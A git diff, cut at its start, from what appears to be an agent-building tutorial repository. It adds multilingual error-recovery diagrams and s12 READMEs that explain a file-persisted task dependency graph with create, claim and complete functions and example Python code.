"exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s11_error_recovery/images/error-recovery-overview.en.svg b/s11_error_recovery/images/error-recovery-overview.en.svg new file mode 100644 index 000000000..22790a3c5 --- /dev/null +++ b/s11_error_recovery/images/error-recovery-overview.en.svg @@ -0,0 +1,98 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + Error Recovery — try/except wrapping LLM calls, three recovery modes + + + + s10 retained + + s11 new + + + + messages + + + + + prompt assembly + (s10) + + + + + compress + load + (s08-s09) + + + + + + LLM + try/except + + + + + TOOL_HANDLERS + bash · read · write + + + + error + + + + Error Recovery (classify, recover, retry LLM) + + + + Path 1 + max_tokens + Output truncated → escalate 8K→64K (once) / continuation prompt (max 3) + Trigger: stop_reason == "max_tokens" · Cost: 0-1 API · Recover then continue + + + + Path 2 + prompt_too_long + Context overflow → reactive compact → retry (one chance) + Trigger: API returns 413 · Cost: 1 API · Still over after compact → exit + + + + Path 3 + 429/529 + Transient failure → exponential backoff + jitter (max 10) / 3×529 → switch model + Trigger: RateLimitError / OverloadedError · Formula: min(500×2^n, 32s) + jitter + + + + Three most common recovery modes. CC has 13+ reason codes (image_error, aborted_streaming, etc.), each with dedicated handling. + All paths after recovery → continue back to LLM · Normal flow: tool results → messages → loop + diff --git a/s11_error_recovery/images/error-recovery-overview.ja.svg b/s11_error_recovery/images/error-recovery-overview.ja.svg new file mode 100644 index 000000000..36c4fd606 --- /dev/null +++ b/s11_error_recovery/images/error-recovery-overview.ja.svg @@ -0,0 +1,98 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + Error Recovery — try/except で LLM 呼び出しをラップ、3 つの復旧モード + + + + s10 維持 + + s11 新規 + + + + messages + + + + + prompt assembly + (s10) + + + + + compress + load + (s08-s09) + + + + + + LLM + try/except + + + + + TOOL_HANDLERS + bash · read · write + + + + エラー + + + + エラー復旧(分類処理、復旧後 LLM に戻りリトライ) + + + + パス 1 + max_tokens + 出力が途切れた → 8K→64K に拡張(1 回)/ 続行プロンプト(最大 3 回) + トリガー: stop_reason == "max_tokens" · コスト: 0-1 API · 復旧後 continue + + + + パス 2 + prompt_too_long + コンテキスト超過 → reactive compact → リトライ(1 回のみ) + トリガー: API が 413 返却 · コスト: 1 API · 圧縮後も超過 → 終了 + + + + パス 3 + 429/529 + 一時障害 → 指数バックオフ + ジッター(最大 10 回)/ 3 回 529 → モデル切替 + トリガー: RateLimitError / OverloadedError · 式: min(500×2^n, 32s) + jitter + + + + 最も一般的な 3 つの復旧モード。CC は実際に 13+ の reason code を持ち(image_error, aborted_streaming 等)、それぞれ専用の処理がある。 + 全パス復旧後 → continue で LLM に戻る · 正常フロー: ツール結果 → messages → ループ + \ No newline at end of file diff --git a/s11_error_recovery/images/error-recovery-overview.svg b/s11_error_recovery/images/error-recovery-overview.svg new file mode 100644 index 000000000..63f4b2fe1 --- /dev/null +++ b/s11_error_recovery/images/error-recovery-overview.svg @@ -0,0 +1,98 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + Error Recovery — try/except 包裹 LLM 调用,三种恢复模式 + + + + s10 保留 + + s11 新增 + + + + messages + + + + + prompt assembly + (s10) + + + + + compress + load + (s08-s09) + + + + + + LLM + try/except + + + + + TOOL_HANDLERS + bash · read · write + + + + 报错 + + + + 错误恢复(分类处理,恢复后回到 LLM 重试) + + + + 路径 1 + max_tokens + 输出被截断 → 升级 8K→64K(一次)/ 续写提示(最多 3 次) + 触发: stop_reason == "max_tokens" · 代价: 0-1 API · 恢复后 continue + + + + 路径 2 + prompt_too_long + 上下文超限 → reactive compact → 重试(一次机会) + 触发: API 返回 413 · 代价: 1 API · 压缩过还是超 → 退出 + + + + 路径 3 + 429/529 + 临时故障 → 指数退避 + 抖动(最多 10 次)/ 3 次 529 → 切换模型 + 触发: RateLimitError / OverloadedError · 公式: min(500×2^n, 32s) + jitter + + + + 三种最常见的恢复模式。CC 实际有 13+ reason code(image_error、aborted_streaming 等),各有专门处理。 + 所有路径恢复后 → continue 回到 LLM · 正常流程: 工具结果 → messages → 循环 + diff --git a/s12_task_system/README.en.md b/s12_task_system/README.en.md new file mode 100644 index 000000000..b4cee602a --- /dev/null +++ b/s12_task_system/README.en.md @@ -0,0 +1,262 @@ +# s12: Task System — Break Big Goals into Small Tasks + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s10 → s11 → `s12` → [s13](../s13_background_tasks/) → s14 → ... → s19 + +> *"Break big goals into small tasks, order them, persist"* — File-persisted task graph, the foundation for multi-agent collaboration. +> +> **Harness Layer**: Tasks — Persisted goals, recoverable progress. + +--- + +## The Problem + +The agent receives a project: set up a database, write APIs, add tests. It uses s05's TodoWrite to create a checklist, then starts working — writes the API first, gets halfway through and realizes there are no database tables, goes back to fix them; when adding tests, discovers the API interface signatures have changed again... + +You can't build the roof before laying the foundation. Tasks have ordering — this "who goes first" relationship has a name: **Directed Acyclic Graph (DAG)**. + +s05's TodoWrite is a list. No dependencies, no persistence — when the conversation ends, the list is gone. What you need is a **task system**: each task is a JSON file, tasks have `blockedBy` dependencies, and they persist across sessions on disk. + +--- + +## The Solution + +![Task System Overview](images/task-system-overview.en.svg) + +s11's loop and prompt assembly are fully preserved. The only change: 4 new task tools + `.tasks/` directory for persistence + `blockedBy` dependency checking. The task system and error recovery are independent layers — in CC source, `utils/tasks.ts` only handles CRUD, while `query.ts`'s with_retry/RecoveryState handles error recovery, with no coupling between them. + +TodoWrite vs Task System: + +| | TodoWrite (s05) | Task System (s12) | +|---|---|---| +| Storage | In-memory list | `.tasks/` JSON files | +| Dependencies | None | `blockedBy` directed acyclic graph | +| Persistence | Lost when conversation ends | Cross-session | +| Multi-agent | None | `owner` field | +| Status | checked / unchecked | pending → in_progress → completed | + +--- + +## How It Works + +![Task DAG](images/task-dag.en.svg) + +### Task: Data Structure + +Each task is a JSON file, stored in the `.tasks/` directory: + +```python +@dataclass +class Task: + id: str + subject: str + description: str + status: str # pending | in_progress | completed + owner: str | None # Agent name (multi-agent scenarios) + blockedBy: list[str] # List of dependency task IDs +``` + +IDs are generated with `timestamp + random hex` — simple but sufficient. CC uses sequential IDs + a highwatermark file to prevent ID reuse, which is a more rigorous design. + +### create_task: Create Tasks + +```python +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random_hex(4)}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task +``` + +Automatically calls `save_task` on creation to write `.tasks/{id}.json`. `blockedBy` declares dependencies — "write API" has `blockedBy: ["task_schema"]`. + +### can_start: Dependency Check + +A task can only start after all its `blockedBy` dependencies are **completed**: + +```python +def can_start(task_id: str) -> bool: + task = load_task(task_id) + for dep_id in task.blockedBy: + dep = load_task(dep_id) + if dep.status != "completed": + return False + return True +``` + +`can_start` is a prerequisite check for `claim_task` — if any `blockedBy` dependency is not completed, the task cannot be claimed. + +### claim_task: Claim a Task + +When the agent starts working on a task, it calls `claim_task`: sets `owner`, changes status from `pending` → `in_progress`. The `owner` field records who is working on the task — preventing duplicate claims in multi-agent scenarios: + +```python +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy + if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + return f"Claimed {task_id} ({task.subject})" +``` + +If the task is already claimed by someone else (`status != "pending"`), or dependencies aren't met (`can_start` returns False), the claim is rejected. + +### complete_task: Complete and Unblock + +When a task is done, set it to `completed`. Simultaneously scan all other tasks to find downstream tasks that were **just unblocked**: + +```python +def complete_task(task_id: str) -> str: + task = load_task(task_id) + task.status = "completed" + save_task(task) + # Find newly unblocked downstream tasks + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy + and can_start(t.id)] + msg = f"Completed {task_id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg +``` + +After completing "schema", `can_start` returns True for "endpoints" and "docs" — they can begin. + +### State Machine: Two Edges + +``` +pending ──claim──→ in_progress ──complete──→ completed +``` + +- **claim**: `pending` → `in_progress`. Sets owner, begins work. +- **complete**: `in_progress` → `completed`. Unblocks downstream. + +CC has no `in_progress → pending` release path. If an agent crashes or abandons, CC uses `unassignTeammateTasks()` to clear the owner, but the status stays at `in_progress` — tasks don't roll back to pending. The tutorial follows the same design. + +### Putting It Together + +```python +# Create tasks with dependencies +schema = create_task("setup database schema") +endpoints = create_task("create API endpoints", blockedBy=[schema.id]) +tests = create_task("write tests", blockedBy=[endpoints.id]) +docs = create_task("write docs", blockedBy=[schema.id]) + +# Agent claims the first available task +claim_task(schema.id) # ✓ Claimed (no dependencies) +complete_task(schema.id) # ✓ Completed → unblocks endpoints, docs + +claim_task(endpoints.id) # ✓ Claimed (schema completed) +complete_task(endpoints.id) # ✓ Completed → unblocks tests + +claim_task(docs.id) # ✓ Claimed (schema completed) +complete_task(docs.id) # ✓ Completed + +claim_task(tests.id) # ✓ Claimed (endpoints completed) +complete_task(tests.id) # ✓ Completed +``` + +Each `create_task` writes a JSON file, each `claim_task` / `complete_task` updates the file. Across sessions, the `.tasks/` directory persists — the agent reads the files to recover progress. + +--- + +## Changes from s11 + +| Component | Before (s11) | After (s12) | +|-----------|-------------|-------------| +| Task management | None | Task dataclass + 4 tools | +| New types | — | Task (id, subject, description, status, owner, blockedBy) | +| Storage | No persistence | `.tasks/{id}.json` cross-session | +| Dependencies | None | `blockedBy` graph + `can_start` check | +| Tools | bash, read_file, write_file (3) | + create_task, list_tasks, claim_task, complete_task (7) | +| Lifecycle | — | pending → in_progress → completed (no release rollback) | + +--- + +## Try It + +```sh +cd learn-claude-code +python s12_task_system/code.py +``` + +Try these prompts: + +1. `Create tasks: setup database schema, create API endpoints (depends on schema), write tests (depends on endpoints), write docs (depends on schema)` +2. `List all tasks and their statuses` +3. `Claim the first unblocked task and complete it` +4. `List tasks again — which ones are now unblocked?` + +What to observe: Are JSON files generated in the `.tasks/` directory? After completing a task, are the blocked tasks unblocked? + +--- + +## What's Next + +The task graph is in place. But some tasks take a long time — like running full test suites or deploying to a server. The agent can't just wait — it's calling the LLM, and time is money. + +s13 Background Tasks → Slow operations go to the background. The agent keeps thinking, and gets notified when the background work is done. + +
+Deep Dive into CC Source + +> The following is a complete analysis based on CC source code `utils/tasks.ts` (862 lines), `TaskCreateTool.ts`, `TaskUpdateTool.ts` (406 lines), `useTaskListWatcher.ts` (222 lines). + +### 1. TaskRecord's Full Fields + +The tutorial only covers id, subject, status, owner, blockedBy. CC actually has 9 fields (`utils/tasks.ts:75-91`): + +| Field | Type | Purpose | +|------|------|------| +| `id` | string | Incrementing integer ID | +| `subject` | string | Short title | +| `description` | string | Free-form description | +| `activeForm` | string? | Present tense form, shown in spinner when in_progress | +| `owner` | string? | Assigned agent ID | +| `status` | pending/in_progress/completed | Lifecycle | +| `blocks` | string[] | Task IDs blocked by this task (downstream) | +| `blockedBy` | string[] | Task IDs blocking this task (upstream) | +| `metadata` | Record? | Arbitrary extension key-value pairs | + +Storage location: `~/.claude/tasks/{taskListId}/{id}.json`. One file per task. + +### 2. Not a TodoWrite Upgrade — Two Independent Systems + +In CC, Task System and TodoWrite **coexist**, toggled by `isTodoV2Enabled()` (`utils/tasks.ts:133`) — non-interactive sessions (SDK) default to Task, interactive sessions use TodoWrite. Task has what TodoWrite lacks: file-lock concurrency protection, dependency enforcement, ownership, fs.watch reactive monitoring, lifecycle hooks. + +### 3. Concurrent Claim Locking + +`claimTask()` (`utils/tasks.ts:541-612`) uses dual locking to prevent races: + +**Task file lock**: `proper-lockfile` locks `{taskId}.json` (up to 30 retries, exponential backoff 5-100ms). Inside the lock: +1. Re-read task (prevent TOCTOU) +2. Check already claimed by another → `already_claimed` +3. Check already completed → `already_resolved` +4. Check upstream not completed → `blocked` +5. Set owner + +**List-level lock** (agent busy check): `.lock` file, atomic scan of all tasks to check if the agent already has other open tasks. + +### 4. High-Water Mark to Prevent ID Reuse + +The `.highwatermark` file records the highest task ID ever assigned. Even if a task is deleted, its ID won't be reused. + +### 5. Four Task Tools + +CC's task system has four tools (not the tutorial's single generic Task tool): `TaskCreate`, `TaskGet`, `TaskUpdate`, `TaskList`. All set `isConcurrencySafe: true` and `shouldDefer: true` (tool schemas aren't in the initial prompt; only visible after ToolSearch). + +
+ + diff --git a/s12_task_system/README.ja.md b/s12_task_system/README.ja.md new file mode 100644 index 000000000..ab9029488 --- /dev/null +++ b/s12_task_system/README.ja.md @@ -0,0 +1,262 @@ +# s12: Task System — 大きな目標を小さなタスクに分割 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s10 → s11 → `s12` → [s13](../s13_background_tasks/) → s14 → ... → s19 + +> *"大きな目標を小さなタスクに分け、順序付け、永続化"* — ファイル永続化タスクグラフ、マルチ Agent 協調の基盤。 +> +> **Harness 層**: タスク — 永続化された目標、復旧可能な進捗。 + +--- + +## 課題 + +Agent がプロジェクトを受けた:データベース構築、API 実装、テスト追加。s05 の TodoWrite でリストを作り、作業開始 — 先に API を書き始め、途中でデータベーステーブルがないことに気づいて戻る。テスト追加時に API インターフェースのシグネチャがまた変わっている... + +屋根を先に建てて基礎を後から打つことはできない。タスクには順序がある — この「どちらが先か」の関係には名前がついている:**有向非巡回グラフ(DAG)**。 + +s05 の TodoWrite はリスト。依存関係も永続化もなく、会話が終わればリストも消える。必要なのは**タスクシステム**:各タスクは JSON ファイル、タスク間に `blockedBy` 依存関係、ディスク上でセッションをまたいで永続化。 + +--- + +## ソリューション + +![Task System Overview](images/task-system-overview.ja.svg) + +s11 のループとプロンプト組み立てはすべて保持。唯一の変更:4 つの新規タスクツール + `.tasks/` ディレクトリによる永続化 + `blockedBy` 依存チェック。タスクシステムとエラーリカバリは独立したレイヤー — CC ソースコードでは `utils/tasks.ts` は CRUD のみ、`query.ts` の with_retry/RecoveryState がエラーリカバリを担当し、互いに非結合。 + +TodoWrite vs Task System: + +| | TodoWrite (s05) | Task System (s12) | +|---|---|---| +| ストレージ | メモリ内リスト | `.tasks/` JSON ファイル | +| 依存関係 | なし | `blockedBy` 有向非巡回グラフ | +| 永続性 | 会話終了で消失 | セッション横断 | +| マルチ Agent | なし | `owner` フィールド | +| ステータス | checked / unchecked | pending → in_progress → completed | + +--- + +## 仕組み + +![Task DAG](images/task-dag.ja.svg) + +### Task: データ構造 + +各タスクは JSON ファイル、`.tasks/` ディレクトリに保存: + +```python +@dataclass +class Task: + id: str + subject: str + description: str + status: str # pending | in_progress | completed + owner: str | None # Agent 名(マルチ Agent シナリオ) + blockedBy: list[str] # 依存タスク ID のリスト +``` + +ID は `timestamp + random hex` で生成 — シンプルだが十分。CC は順次 ID + highwatermark ファイルで ID 再利用を防止する、より厳密な設計。 + +### create_task: タスク作成 + +```python +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random_hex(4)}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task +``` + +作成時に自動的に `save_task` で `.tasks/{id}.json` に書き込み。`blockedBy` で依存を宣言 — "API を書く" の `blockedBy` は `["task_schema"]`。 + +### can_start: 依存チェック + +タスクは `blockedBy` が**すべて completed** になってからでないと開始できない: + +```python +def can_start(task_id: str) -> bool: + task = load_task(task_id) + for dep_id in task.blockedBy: + dep = load_task(dep_id) + if dep.status != "completed": + return False + return True +``` + +`can_start` は `claim_task` の事前チェック — `blockedBy` に一つでも completed でないものがあれば、認識不可。 + +### claim_task: タスク認識 + +Agent がタスクに取り掛かる時、`claim_task` を呼び出し:`owner` を設定、ステータスを `pending` → `in_progress` に変更。`owner` フィールドは誰が作業中かを記録 — マルチ Agent シナリオで重複認識を防止: + +```python +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy + if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + return f"Claimed {task_id} ({task.subject})" +``` + +タスクが既に他者に認識されている(`status != "pending"`)、または依存が未完了(`can_start` が False)の場合、認識を拒否。 + +### complete_task: 完了とアンロック + +タスク完了後、`completed` に設定。同時に他の全タスクを走査し、**直前にアンロックされた**下流タスクを特定: + +```python +def complete_task(task_id: str) -> str: + task = load_task(task_id) + task.status = "completed" + save_task(task) + # アンロックされた下流タスクを検索 + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy + and can_start(t.id)] + msg = f"Completed {task_id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg +``` + +"schema" 完了後、"endpoints" と "docs" の `can_start` が True を返し、開始可能に。 + +### 状態マシン: 2 つの遷移 + +``` +pending ──claim──→ in_progress ──complete──→ completed +``` + +- **claim**: `pending` → `in_progress`。owner を設定、作業開始。 +- **complete**: `in_progress` → `completed`。下流をアンロック。 + +CC には `in_progress → pending` の release パスがない。Agent がクラッシュや放棄した場合、CC は `unassignTeammateTasks()` で owner をクリアするが、status は `in_progress` を維持 — タスクは pending に戻らない。チュートリアルも同じ設計に従う。 + +### 組み合わせて実行 + +```python +# 依存関係のあるタスクを作成 +schema = create_task("setup database schema") +endpoints = create_task("create API endpoints", blockedBy=[schema.id]) +tests = create_task("write tests", blockedBy=[endpoints.id]) +docs = create_task("write docs", blockedBy=[schema.id]) + +# Agent が最初に実行可能なタスクを認識 +claim_task(schema.id) # ✓ Claimed(依存なし) +complete_task(schema.id) # ✓ Completed → endpoints, docs をアンロック + +claim_task(endpoints.id) # ✓ Claimed(schema 完了済み) +complete_task(endpoints.id) # ✓ Completed → tests をアンロック + +claim_task(docs.id) # ✓ Claimed(schema 完了済み) +complete_task(docs.id) # ✓ Completed + +claim_task(tests.id) # ✓ Claimed(endpoints 完了済み) +complete_task(tests.id) # ✓ Completed +``` + +各 `create_task` が JSON ファイルを書き込み、各 `claim_task` / `complete_task` がファイルを更新。セッションをまたいでも `.tasks/` ディレクトリが残り、Agent はファイルを読んで進捗を復旧。 + +--- + +## s11 からの変更 + +| コンポーネント | 変更前 (s11) | 変更後 (s12) | +|--------------|------------|------------| +| タスク管理 | なし | Task dataclass + 4 ツール | +| 新規型 | — | Task(id, subject, description, status, owner, blockedBy) | +| ストレージ | 永続化なし | `.tasks/{id}.json` セッション横断 | +| 依存関係 | なし | `blockedBy` グラフ + `can_start` チェック | +| ツール | bash, read_file, write_file (3) | + create_task, list_tasks, claim_task, complete_task (7) | +| ライフサイクル | — | pending → in_progress → completed(release ロールバックなし) | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s12_task_system/code.py +``` + +以下のプロンプトを試してください: + +1. `Create tasks: setup database schema, create API endpoints (depends on schema), write tests (depends on endpoints), write docs (depends on schema)` +2. `List all tasks and their statuses` +3. `Claim the first unblocked task and complete it` +4. `List tasks again — which ones are now unblocked?` + +観察ポイント:`.tasks/` ディレクトリに JSON ファイルが生成されているか?タスク完了後、ブロックされていたタスクがアンロックされているか? + +--- + +## 次の章 + +タスクグラフができた。しかし、一部のタスクは長時間かかる — 全テスト実行やサーバーデプロイなど。Agent は待っていられない — LLM を呼び出している、時間はお金。 + +s13 Background Tasks → 遅い操作はバックグラウンドへ。Agent は思考を続け、バックグラウンドの完了を通知で受け取る。 + +
+CC ソースコード深掘り + +> 以下は CC ソースコード `utils/tasks.ts`(862 行)、`TaskCreateTool.ts`、`TaskUpdateTool.ts`(406 行)、`useTaskListWatcher.ts`(222 行)の完全分析に基づきます。 + +### 一、TaskRecord の完全フィールド + +チュートリアルでは id、subject、status、owner、blockedBy のみ解説。CC は実際に 9 フィールドを持つ(`utils/tasks.ts:75-91`): + +| フィールド | 型 | 用途 | +|------|------|------| +| `id` | string | 昇順整数 ID | +| `subject` | string | 短いタイトル | +| `description` | string | 自由形式の説明 | +| `activeForm` | string? | 現在進行形、in_progress 時にスピナーに表示 | +| `owner` | string? | 割り当てられた agent ID | +| `status` | pending/in_progress/completed | ライフサイクル | +| `blocks` | string[] | このタスクがブロックするタスク ID(下流) | +| `blockedBy` | string[] | このタスクをブロックするタスク ID(上流) | +| `metadata` | Record? | 任意の拡張キーバリューペア | + +保存場所:`~/.claude/tasks/{taskListId}/{id}.json`。タスクごとに 1 ファイル。 + +### 二、TodoWrite のアップグレードではなく、2 つの独立システム + +CC では Task System と TodoWrite **は共存**し、`isTodoV2Enabled()` で切り替え(`utils/tasks.ts:133`)— 非対話セッション(SDK)はデフォルトで Task、対話セッションは TodoWrite。Task は TodoWrite にない機能を持つ:ファイルロック並行保護、依存関係強制、ownership、fs.watch リアクティブ監視、ライフサイクルフック。 + +### 三、並行認識のロック機構 + +`claimTask()`(`utils/tasks.ts:541-612`)は二重ロックで競合を防止: + +**タスクファイルロック**:`proper-lockfile` で `{taskId}.json` をロック(最大 30 リトライ、指数バックオフ 5-100ms)。ロック内: +1. タスクを再読込(TOCTOU 防止) +2. 既に他者が認識済み → `already_claimed` +3. 既に完了済み → `already_resolved` +4. 上流が未完了 → `blocked` +5. owner を設定 + +**リストレベルロック**(agent busy チェック時):`.lock` ファイル、全タスクを原子的に走査し該当 agent が他の open task を持つか確認。 + +### 四、高水位標による ID 再利用防止 + +`.highwatermark` ファイルが過去に割り当てられた最大タスク ID を記録。タスクが削除されても ID は再利用されない。 + +### 五、4 つの Task ツール + +CC のタスクシステムは 4 つのツールを持つ(チュートリアルの汎用 Task ツールとは異なる):`TaskCreate`、`TaskGet`、`TaskUpdate`、`TaskList`。すべて `isConcurrencySafe: true` と `shouldDefer: true` が設定(ツールスキーマは初期プロンプトに含まれず、ToolSearch 後にのみ可視)。 + +
+ + diff --git a/s12_task_system/README.md b/s12_task_system/README.md new file mode 100644 index 000000000..2f30e5d8a --- /dev/null +++ b/s12_task_system/README.md @@ -0,0 +1,262 @@ +# s12: Task System — 目标太大,拆成小任务 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s10 → s11 → `s12` → [s13](../s13_background_tasks/) → s14 → ... → s19 + +> *"大目标拆成小任务, 排好序, 持久化"* — 文件持久化的任务图, 多 agent 协作的基础。 +> +> **Harness 层**: 任务 — 持久化的目标, 可恢复的进度。 + +--- + +## 问题 + +Agent 接到一个项目:搭数据库、写 API、加测试。它用 s05 的 TodoWrite 列了一张清单,然后开始干活——先写 API,写到一半发现没数据库表,回头改;加测试时发现 API 接口签名又改了... + +盖房子不能先盖屋顶再打地基。任务之间有先后——这种"谁先谁后"的关系,有个名字叫**有向无环图(DAG)**。 + +s05 的 TodoWrite 是一个列表。没有依赖关系、没有持久化、对话结束列表就没了。你需要的是**任务系统**:每个任务是一个 JSON 文件,任务之间有 `blockedBy` 依赖,跨会话持久化在磁盘上。 + +--- + +## 解决方案 + +![Task System Overview](images/task-system-overview.svg) + +s11 的循环、prompt 组装全部保留。唯一的变动:新增 4 个任务工具 + `.tasks/` 目录持久化 + `blockedBy` 依赖检查。任务系统与错误恢复是独立层——CC 源码中 `utils/tasks.ts` 只管 CRUD,`query.ts` 的 with_retry/RecoveryState 管错误恢复,互不耦合。 + +TodoWrite vs Task System: + +| | TodoWrite (s05) | Task System (s12) | +|---|---|---| +| 存储 | 内存列表 | `.tasks/` JSON 文件 | +| 依赖 | 无 | `blockedBy` 有向无环图 | +| 持久性 | 对话结束即丢 | 跨会话 | +| 多 Agent | 无 | `owner` 字段 | +| 状态 | checked / unchecked | pending → in_progress → completed | + +--- + +## 工作原理 + +![Task DAG](images/task-dag.svg) + +### Task: 数据结构 + +每个任务是一个 JSON 文件,存于 `.tasks/` 目录: + +```python +@dataclass +class Task: + id: str + subject: str + description: str + status: str # pending | in_progress | completed + owner: str | None # Agent 名(多 Agent 场景) + blockedBy: list[str] # 依赖的任务 ID 列表 +``` + +ID 用 `timestamp + random hex` 生成——简单但够用。CC 用顺序 ID + highwatermark 文件防止 ID 重用,是更严谨的设计。 + +### create_task: 创建任务 + +```python +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random_hex(4)}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task +``` + +创建时自动 `save_task` 到 `.tasks/{id}.json`。`blockedBy` 声明依赖——"写 API"的 `blockedBy` 是 `["task_schema"]`。 + +### can_start: 依赖检查 + +一个任务只能在它的 `blockedBy` **全部 completed** 之后才能开始: + +```python +def can_start(task_id: str) -> bool: + task = load_task(task_id) + for dep_id in task.blockedBy: + dep = load_task(dep_id) + if dep.status != "completed": + return False + return True +``` + +`can_start` 是 `claim_task` 的前置检查——`blockedBy` 里有任何一个不是 completed,就不能认领。 + +### claim_task: 认领任务 + +Agent 开始做一个任务时,调用 `claim_task`:设置 `owner`,状态从 `pending` → `in_progress`。`owner` 字段记录谁在做这个任务——多 Agent 场景下防止重复认领: + +```python +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy + if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + return f"Claimed {task_id} ({task.subject})" +``` + +如果任务已被别人认领(`status != "pending"`),或者依赖没完成(`can_start` 返回 False),拒绝认领。 + +### complete_task: 完成与解锁 + +任务做完后,设为 `completed`。同时扫描所有其他任务,找出**刚刚被解锁**的下游任务: + +```python +def complete_task(task_id: str) -> str: + task = load_task(task_id) + task.status = "completed" + save_task(task) + # 找出被解锁的下游任务 + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy + and can_start(t.id)] + msg = f"Completed {task_id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg +``` + +完成 "schema" 后,"endpoints" 和 "docs" 的 `can_start` 返回 True,它们可以开始。 + +### 状态机: 两条边 + +``` +pending ──claim──→ in_progress ──complete──→ completed +``` + +- **claim**: `pending` → `in_progress`。设置 owner,开始工作。 +- **complete**: `in_progress` → `completed`。解锁下游。 + +CC 没有 `in_progress → pending` 的 release 路径。如果 Agent 崩溃或放弃,CC 用 `unassignTeammateTasks()` 清除 owner,但 status 保持在 `in_progress`——任务不会回退到 pending。教学版遵循同样的设计。 + +### 合起来跑 + +```python +# 创建有依赖的任务 +schema = create_task("setup database schema") +endpoints = create_task("create API endpoints", blockedBy=[schema.id]) +tests = create_task("write tests", blockedBy=[endpoints.id]) +docs = create_task("write docs", blockedBy=[schema.id]) + +# Agent 认领第一个可做的任务 +claim_task(schema.id) # ✓ Claimed (无依赖) +complete_task(schema.id) # ✓ Completed → 解锁 endpoints, docs + +claim_task(endpoints.id) # ✓ Claimed (schema 已完成) +complete_task(endpoints.id) # ✓ Completed → 解锁 tests + +claim_task(docs.id) # ✓ Claimed (schema 已完成) +complete_task(docs.id) # ✓ Completed + +claim_task(tests.id) # ✓ Claimed (endpoints 已完成) +complete_task(tests.id) # ✓ Completed +``` + +每个 `create_task` 写一个 JSON 文件,每个 `claim_task` / `complete_task` 更新文件。跨会话时,`.tasks/` 目录还在,Agent 读文件就能恢复进度。 + +--- + +## 相对 s11 的变更 + +| 组件 | 之前 (s11) | 之后 (s12) | +|------|-----------|-----------| +| 任务管理 | 无 | Task dataclass + 4 个工具 | +| 新类型 | — | Task(id, subject, description, status, owner, blockedBy) | +| 存储 | 无持久化 | `.tasks/{id}.json` 跨会话 | +| 依赖 | 无 | `blockedBy` 图 + `can_start` 检查 | +| 工具 | bash, read_file, write_file (3) | + create_task, list_tasks, claim_task, complete_task (7) | +| 生命周期 | — | pending → in_progress → completed(无 release 回退) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s12_task_system/code.py +``` + +试试这些 prompt: + +1. `Create tasks: setup database schema, create API endpoints (depends on schema), write tests (depends on endpoints), write docs (depends on schema)` +2. `List all tasks and their statuses` +3. `Claim the first unblocked task and complete it` +4. `List tasks again — which ones are now unblocked?` + +观察重点:`.tasks/` 目录下是否生成了 JSON 文件?完成任务后,被阻塞的任务是否解锁? + +--- + +## 接下来 + +任务图有了。但有些任务要跑很久——比如跑全量测试、部署到服务器。Agent 不能干等着——它在调 LLM,时间就是钱。 + +s13 Background Tasks → 慢操作放后台。Agent 继续思考,后台跑完了通知它。 + +
